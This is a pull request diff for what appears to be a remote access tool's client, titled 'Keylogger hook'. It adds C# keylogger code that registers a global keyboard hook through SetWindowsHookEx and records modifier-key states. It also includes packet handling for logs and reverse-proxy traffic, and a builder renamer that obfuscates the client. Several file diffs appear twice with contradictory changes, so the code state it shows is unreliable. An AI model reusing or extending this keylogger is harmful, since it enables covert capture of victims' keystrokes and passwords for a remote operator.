### PR TITLE
Keylogger hook

### DIFF
--- a/Client/Core/Keylogger/KeyloggerHelpers.cs
+++ b/Client/Core/Keylogger/KeyloggerHelpers.cs
@@ -97,30 +97,13 @@ namespace xClient.Core.Keylogger
         }
 
         /// <summary>
-        /// Determines if the number lock key code provided is in a toggled state.
+        /// Determines if the key code provided is in a toggled state.
         /// </summary>
+        /// <param name="sender">The code for the key.</param>
         /// <returns>True if toggled on; False if toggled off.</returns>
-        public static bool NumLockToggled()
+        public static bool IsKeyToggled(this short sender)
         {
-            return Control.IsKeyLocked(Keys.NumLock);
-        }
-        
-        /// <summary>
-        /// Determines if the scroll lock key code provided is in a toggled state.
-        /// </summary>
-        /// <returns>True if toggled on; False if toggled off.</returns>
-        public static bool ScrollLockToggled()
-        {
-            return Control.IsKeyLocked(Keys.Scroll);
-        }
-        
-        /// <summary>
-        /// Determines if the caps lock key code provided is in a toggled state.
-        /// </summary>
-        /// <returns>True if toggled on; False if toggled off.</returns>
-        public static bool CapsLockToggled()
-        {
-            return Control.IsKeyLocked(Keys.CapsLock);
+            return (sender & 0x0001) != 0;
         }
 
         public static string BuildString(this KeyloggerModifierKeys sender)
@@ -144,6 +127,20 @@ namespace xClient.Core.Keylogger
 
                     if (!string.IsNullOrEmpty(AltName))
                         BuiltModifierKeys.Append(AltName + " + ");
+                }
+                if (sender.ShiftKeyPressed)
+                {
+                    string ShiftName = KeyloggerKeys.VK_SHIFT.GetKeyloggerKeyName();
+
+                    if (!string.IsNullOrEmpty(ShiftName))
+                        BuiltModifierKeys.Append(ShiftName + " + ");
+                }
+                if (sender.WindowsKeyPressed)
+                {
+                    string WinName = KeyloggerKeys.VK_LWIN.GetKeyloggerKeyName();
+
+                    if (!string.IsNullOrEmpty(WinName))
+                        BuiltModifierKeys.Append(WinName + " + ");
                 }
 
                 return BuiltModifierKeys.ToString();

--- a/Client/Core/Keylogger/KeyloggerHelpers.cs
+++ b/Client/Core/Keylogger/KeyloggerHelpers.cs
@@ -4,6 +4,7 @@ using System.Text;
 using System.Reflection;
 using xClient.Core.Keylogger;
 using System.Runtime.CompilerServices;
+using System.Windows.Forms;
 
 namespace xClient.Core.Keylogger
 {
@@ -92,17 +93,34 @@ namespace xClient.Core.Keylogger
         /// <returns>True if key is pressed; False if the key is not.</returns>
         public static bool IsKeyPressed(this short sender)
         {
-            return (sender & 0x8000) == 0x8000;
+            return (sender & 0x8000) != 0;
         }
 
         /// <summary>
-        /// Determines if the key code provided is in a toggled state.
+        /// Determines if the number lock key code provided is in a toggled state.
         /// </summary>
-        /// <param name="sender">The code for the key.</param>
         /// <returns>True if toggled on; False if toggled off.</returns>
-        public static bool IsKeyToggled(this short sender)
+        public static bool NumLockToggled()
         {
-            return (sender & 0xffff) == 0xffff;
+            return Control.IsKeyLocked(Keys.NumLock);
+        }
+        
+        /// <summary>
+        /// Determines if the scroll lock key code provided is in a toggled state.
+        /// </summary>
+        /// <returns>True if toggled on; False if toggled off.</returns>
+        public static bool ScrollLockToggled()
+        {
+            return Control.IsKeyLocked(Keys.Scroll);
+        }
+        
+        /// <summary>
+        /// Determines if the caps lock key code provided is in a toggled state.
+        /// </summary>
+        /// <returns>True if toggled on; False if toggled off.</returns>
+        public static bool CapsLockToggled()
+        {
+            return Control.IsKeyLocked(Keys.CapsLock);
         }
 
         public static string BuildString(this KeyloggerModifierKeys sender)
@@ -118,14 +136,14 @@ namespace xClient.Core.Keylogger
                     string CtrlName = KeyloggerKeys.VK_CONTROL.GetKeyloggerKeyName();
 
                     if (!string.IsNullOrEmpty(CtrlName))
-                        BuiltModifierKeys.Append(CtrlName + " +");
+                        BuiltModifierKeys.Append(CtrlName + " + ");
                 }
                 if (sender.AltKeyPressed)
                 {
                     string AltName = KeyloggerKeys.VK_MENU.GetKeyloggerKeyName();
 
                     if (!string.IsNullOrEmpty(AltName))
-                        BuiltModifierKeys.Append(" " + AltName + " +");
+                        BuiltModifierKeys.Append(AltName + " + ");
                 }
 
                 return BuiltModifierKeys.ToString();

--- a/Client/Core/Keylogger/KeyloggerKeys.cs
+++ b/Client/Core/Keylogger/KeyloggerKeys.cs
@@ -20,10 +20,10 @@ namespace xClient.Core.Keylogger
         public bool ShiftKeyPressed { get; set; }
         public bool AltKeyPressed { get; set; }
         public bool CtrlKeyPressed { get; set; }
-
         public bool CapsLock { get; set; }
         public bool NumLock { get; set; }
         public bool ScrollLock { get; set; }
+        public bool WindowsKeyPressed { get; set; }
     }
 
     /// <summary>
@@ -36,10 +36,12 @@ namespace xClient.Core.Keylogger
         /// Gets the key that was pressed.
         /// </summary>
         public KeyloggerKeys PressedKey { get; set; }
+
         /// <summary>
         /// An object with the purpose of storing the states of modifier keys.
         /// </summary>
         public KeyloggerModifierKeys ModifierKeys { get; private set; }
+
         /// <summary>
         /// Determines if one of the modifier keys (excluding shift and caps
         /// lock) has been set.
@@ -56,27 +58,21 @@ namespace xClient.Core.Keylogger
             {
                 // Modifier keys that are pressed:
                 CtrlKeyPressed = Win32.GetAsyncKeyState(KeyloggerKeys.VK_CONTROL).IsKeyPressed(),
-                    //Win32.GetAsyncKeyState(KeyloggerKeys.VK_CONTROL).IsKeyPressed() ||
-                    //Win32.GetAsyncKeyState(KeyloggerKeys.VK_LCONTROL).IsKeyPressed() ||
-                    //Win32.GetAsyncKeyState(KeyloggerKeys.VK_RCONTROL).IsKeyPressed(),
                 AltKeyPressed = Win32.GetAsyncKeyState(KeyloggerKeys.VK_MENU).IsKeyPressed(),
-                    //Win32.GetAsyncKeyState(KeyloggerKeys.VK_MENU).IsKeyPressed() ||
-                    //Win32.GetAsyncKeyState(KeyloggerKeys.VK_LMENU).IsKeyPressed() ||
-                    //Win32.GetAsyncKeyState(KeyloggerKeys.VK_RMENU).IsKeyPressed(),
                 ShiftKeyPressed = Win32.GetAsyncKeyState(KeyloggerKeys.VK_SHIFT).IsKeyPressed(),
-                    //Win32.GetAsyncKeyState(KeyloggerKeys.VK_SHIFT).IsKeyPressed() ||
-                    //Win32.GetAsyncKeyState(KeyloggerKeys.VK_LSHIFT).IsKeyPressed() ||
-                    //Win32.GetAsyncKeyState(KeyloggerKeys.VK_RSHIFT).IsKeyPressed(),
                 // Modifier keys that have a state (toggle 'on' or 'off').
-                CapsLock = KeyloggerHelpers.CapsLockToggled(),
-                NumLock = KeyloggerHelpers.NumLockToggled(),
-                ScrollLock = KeyloggerHelpers.ScrollLockToggled()
+                CapsLock = Win32.GetAsyncKeyState(KeyloggerKeys.VK_CAPITAL).IsKeyToggled(),
+                NumLock = Win32.GetAsyncKeyState(KeyloggerKeys.VK_NUMLOCK).IsKeyToggled(),
+                ScrollLock = Win32.GetAsyncKeyState(KeyloggerKeys.VK_SCROLL).IsKeyToggled(),
+                WindowsKeyPressed = 
+                    Win32.GetAsyncKeyState(KeyloggerKeys.VK_LWIN).IsKeyToggled() ||
+                    Win32.GetAsyncKeyState(KeyloggerKeys.VK_RWIN).IsKeyToggled()
             };
 
             // To avoid having to repeatedly check if one of the modifier
             // keys (besides shift and caps lock) was set, just simply
             // decide and then store it right here.
-            ModifierKeysSet = (ModifierKeys.CtrlKeyPressed || ModifierKeys.AltKeyPressed);
+            ModifierKeysSet = (ModifierKeys.CtrlKeyPressed || ModifierKeys.AltKeyPressed || ModifierKeys.WindowsKeyPressed);
         }
     }
 

--- a/Client/Core/Keylogger/KeyloggerKeys.cs
+++ b/Client/Core/Keylogger/KeyloggerKeys.cs
@@ -56,19 +56,27 @@ namespace xClient.Core.Keylogger
             {
                 // Modifier keys that are pressed:
                 CtrlKeyPressed = Win32.GetAsyncKeyState(KeyloggerKeys.VK_CONTROL).IsKeyPressed(),
+                    //Win32.GetAsyncKeyState(KeyloggerKeys.VK_CONTROL).IsKeyPressed() ||
+                    //Win32.GetAsyncKeyState(KeyloggerKeys.VK_LCONTROL).IsKeyPressed() ||
+                    //Win32.GetAsyncKeyState(KeyloggerKeys.VK_RCONTROL).IsKeyPressed(),
                 AltKeyPressed = Win32.GetAsyncKeyState(KeyloggerKeys.VK_MENU).IsKeyPressed(),
+                    //Win32.GetAsyncKeyState(KeyloggerKeys.VK_MENU).IsKeyPressed() ||
+                    //Win32.GetAsyncKeyState(KeyloggerKeys.VK_LMENU).IsKeyPressed() ||
+                    //Win32.GetAsyncKeyState(KeyloggerKeys.VK_RMENU).IsKeyPressed(),
                 ShiftKeyPressed = Win32.GetAsyncKeyState(KeyloggerKeys.VK_SHIFT).IsKeyPressed(),
+                    //Win32.GetAsyncKeyState(KeyloggerKeys.VK_SHIFT).IsKeyPressed() ||
+                    //Win32.GetAsyncKeyState(KeyloggerKeys.VK_LSHIFT).IsKeyPressed() ||
+                    //Win32.GetAsyncKeyState(KeyloggerKeys.VK_RSHIFT).IsKeyPressed(),
                 // Modifier keys that have a state (toggle 'on' or 'off').
-                CapsLock = Win32.GetAsyncKeyState(KeyloggerKeys.VK_CAPITAL).IsKeyToggled(),
-                NumLock = Win32.GetAsyncKeyState(KeyloggerKeys.VK_NUMLOCK).IsKeyToggled(),
-                ScrollLock = Win32.GetAsyncKeyState(KeyloggerKeys.VK_SCROLL).IsKeyToggled()
+                CapsLock = KeyloggerHelpers.CapsLockToggled(),
+                NumLock = KeyloggerHelpers.NumLockToggled(),
+                ScrollLock = KeyloggerHelpers.ScrollLockToggled()
             };
 
             // To avoid having to repeatedly check if one of the modifier
             // keys (besides shift and caps lock) was set, just simply
             // decide and then store it right here.
-            ModifierKeysSet = (ModifierKeys.CtrlKeyPressed || ModifierKeys.AltKeyPressed ||
-                               ModifierKeys.NumLock        || ModifierKeys.ScrollLock);
+            ModifierKeysSet = (ModifierKeys.CtrlKeyPressed || ModifierKeys.AltKeyPressed);
         }
     }
 
@@ -178,7 +186,7 @@ namespace xClient.Core.Keylogger
         /// <summary>
         /// SPACEBAR key.
         /// </summary>
-        [KeyloggerKey("SPACE", true)]
+        [KeyloggerKey(" ")]
         VK_SPACE = 0x20,
 
         /// <summary>
@@ -793,37 +801,37 @@ namespace xClient.Core.Keylogger
         /// <summary>
         /// Left SHIFT key.
         /// </summary>
-        [KeyloggerKey("LSHIFT", true)]
+        [KeyloggerKey("SHIFT", true)]
         VK_LSHIFT = 0xA0,
 
         /// <summary>
         /// Right SHIFT key.
         /// </summary>
-        [KeyloggerKey("RSHIFT", true)]
+        [KeyloggerKey("SHIFT", true)]
         VK_RSHIFT = 0xA1,
 
         /// <summary>
         /// Left CONTROL (CTRL) key.
         /// </summary>
-        [KeyloggerKey("LCTRL", true)]
+        [KeyloggerKey("CTRL", true)]
         VK_LCONTROL = 0xA2,
 
         /// <summary>
         /// Right CONTROL (CTRL) key.
         /// </summary>
-        [KeyloggerKey("RCTRL", true)]
+        [KeyloggerKey("CTRL", true)]
         VK_RCONTROL = 0xA3,
 
         /// <summary>
         /// Left MENU key.
         /// </summary>
-        [KeyloggerKey("LALT", true)]
+        [KeyloggerKey("ALT", true)]
         VK_LMENU = 0xA4,
 
         /// <summary>
         /// Right MENU key.
         /// </summary>
-        [KeyloggerKey("RALT", true)]
+        [KeyloggerKey("ALT", true)]
         VK_RMENU = 0xA5,
 
         /// <summary>

--- a/Client/Core/Keylogger/Win32.cs
+++ b/Client/Core/Keylogger/Win32.cs
@@ -1,10 +1,6 @@
 ﻿using System;
-using System.Collections.Generic;
-using System.IO;
 using System.Runtime.InteropServices;
 using System.Text;
-using System.Threading;
-using System.Windows.Forms;
 
 namespace xClient.Core.Keylogger
 {
@@ -49,5 +45,20 @@ namespace xClient.Core.Keylogger
 
         [DllImport("user32.dll", ExactSpelling = true)]
         internal static extern IntPtr GetKeyboardLayout(uint threadId);
+
+        [DllImport("kernel32.dll")]
+        internal static extern IntPtr LoadLibrary(string lpFileName);
+
+        [DllImport("user32.dll", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall, SetLastError = true)]
+        internal static extern IntPtr SetWindowsHookEx(int hookID, Logger.HookProcDelegate callback, IntPtr hInstance, int threadID);
+
+        [DllImport("user32.dll", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall, SetLastError = true)]
+        internal static extern bool UnhookWindowsHookEx(IntPtr hookHandle);
+
+        [DllImport("user32.dll", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+        internal static extern int CallNextHookEx(IntPtr hookHandle, int nCode, int wParam, ref Logger.KeyData lParam);
+
+        [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
+        internal static extern IntPtr GetModuleHandle(string lpModuleName);
     }
 }

--- a/Client/Program.cs
+++ b/Client/Program.cs
@@ -7,6 +7,7 @@ using xClient.Core;
 using xClient.Core.Commands;
 using xClient.Core.Keylogger;
 using xClient.Core.Packets;
+using xClient.Core.ReverseProxy;
 
 namespace System.Runtime.CompilerServices
 {
@@ -98,7 +99,11 @@ namespace xClient
                 typeof (Core.Packets.ClientPackets.MonitorsResponse),
                 typeof (Core.Packets.ClientPackets.ShellCommandResponse),
                 typeof (Core.Packets.ClientPackets.GetStartupItemsResponse),
-                typeof (Core.Packets.ClientPackets.GetLogsResponse)
+                typeof (Core.Packets.ClientPackets.GetLogsResponse),
+                typeof (Core.ReverseProxy.Packets.ReverseProxyConnect),
+                typeof (Core.ReverseProxy.Packets.ReverseProxyConnectResponse),
+                typeof (Core.ReverseProxy.Packets.ReverseProxyData),
+                typeof (Core.ReverseProxy.Packets.ReverseProxyDisconnect)
             });
 
             ConnectClient.ClientState += ClientState;
@@ -330,7 +335,14 @@ namespace xClient
             }
             else if (type == typeof(Core.Packets.ServerPackets.GetLogs))
             {
-                CommandHandler.HandleGetLogs((Core.Packets.ServerPackets.GetLogs) packet, client);
+                CommandHandler.HandleGetLogs((Core.Packets.ServerPackets.GetLogs)packet, client);
+            }
+            else if (type == typeof(Core.ReverseProxy.Packets.ReverseProxyConnect) ||
+                     type == typeof(Core.ReverseProxy.Packets.ReverseProxyConnectResponse) ||
+                     type == typeof(Core.ReverseProxy.Packets.ReverseProxyData) ||
+                     type == typeof(Core.ReverseProxy.Packets.ReverseProxyDisconnect))
+            {
+                ReverseProxyCommandHandler.HandleCommand(client, packet);
             }
         }
     }

--- a/Client/Program.cs
+++ b/Client/Program.cs
@@ -7,7 +7,6 @@ using xClient.Core;
 using xClient.Core.Commands;
 using xClient.Core.Keylogger;
 using xClient.Core.Packets;
-using xClient.Core.ReverseProxy;
 
 namespace System.Runtime.CompilerServices
 {
@@ -100,10 +99,6 @@ namespace xClient
                 typeof (Core.Packets.ClientPackets.ShellCommandResponse),
                 typeof (Core.Packets.ClientPackets.GetStartupItemsResponse),
                 typeof (Core.Packets.ClientPackets.GetLogsResponse),
-                typeof (Core.ReverseProxy.Packets.ReverseProxyConnect),
-                typeof (Core.ReverseProxy.Packets.ReverseProxyConnectResponse),
-                typeof (Core.ReverseProxy.Packets.ReverseProxyData),
-                typeof (Core.ReverseProxy.Packets.ReverseProxyDisconnect)
             });
 
             ConnectClient.ClientState += ClientState;
@@ -336,13 +331,6 @@ namespace xClient
             else if (type == typeof(Core.Packets.ServerPackets.GetLogs))
             {
                 CommandHandler.HandleGetLogs((Core.Packets.ServerPackets.GetLogs)packet, client);
-            }
-            else if (type == typeof(Core.ReverseProxy.Packets.ReverseProxyConnect) ||
-                     type == typeof(Core.ReverseProxy.Packets.ReverseProxyConnectResponse) ||
-                     type == typeof(Core.ReverseProxy.Packets.ReverseProxyData) ||
-                     type == typeof(Core.ReverseProxy.Packets.ReverseProxyDisconnect))
-            {
-                ReverseProxyCommandHandler.HandleCommand(client, packet);
             }
         }
     }

--- a/Server/Core/Build/Renamer.cs
+++ b/Server/Core/Build/Renamer.cs
@@ -58,9 +58,14 @@ namespace xServer.Core.Build
 
         private void RenameInType(TypeDefinition typeDef)
         {
-            if (typeDef.Namespace.StartsWith("My") || typeDef.Namespace.StartsWith("xClient.Core.Packets") ||
-                typeDef.Namespace == "xClient.Core" || typeDef.Namespace == "xClient.Core.Elevation" ||
-                typeDef.Namespace == "xClient.Core.Compression" || typeDef.Namespace.StartsWith("ProtoBuf"))
+            if (typeDef.Namespace.StartsWith("My") 
+                || typeDef.Namespace.StartsWith("xClient.Core.Packets") 
+                || typeDef.Namespace == "xClient.Core" 
+                || typeDef.Namespace == "xClient.Core.Elevation" 
+                || typeDef.Namespace == "xClient.Core.Compression" 
+                || typeDef.Namespace.StartsWith("ProtoBuf") 
+                || typeDef.Namespace.Contains("xClient.Core.ReverseProxy") 
+                || typeDef.Namespace.Contains("xClient.Core.Keylogger"))
                 return;
 
             TypeOverloader.GiveName(typeDef);


### PR DESCRIPTION
Bugs: Thread doesn't exit when disabling the hook, has something to do with message pump I believe

Todo: handle modifier keys in another manner.  for example a user presses control, and while control is down the user decides to press a, the log will display [CTRL][CTRL + a]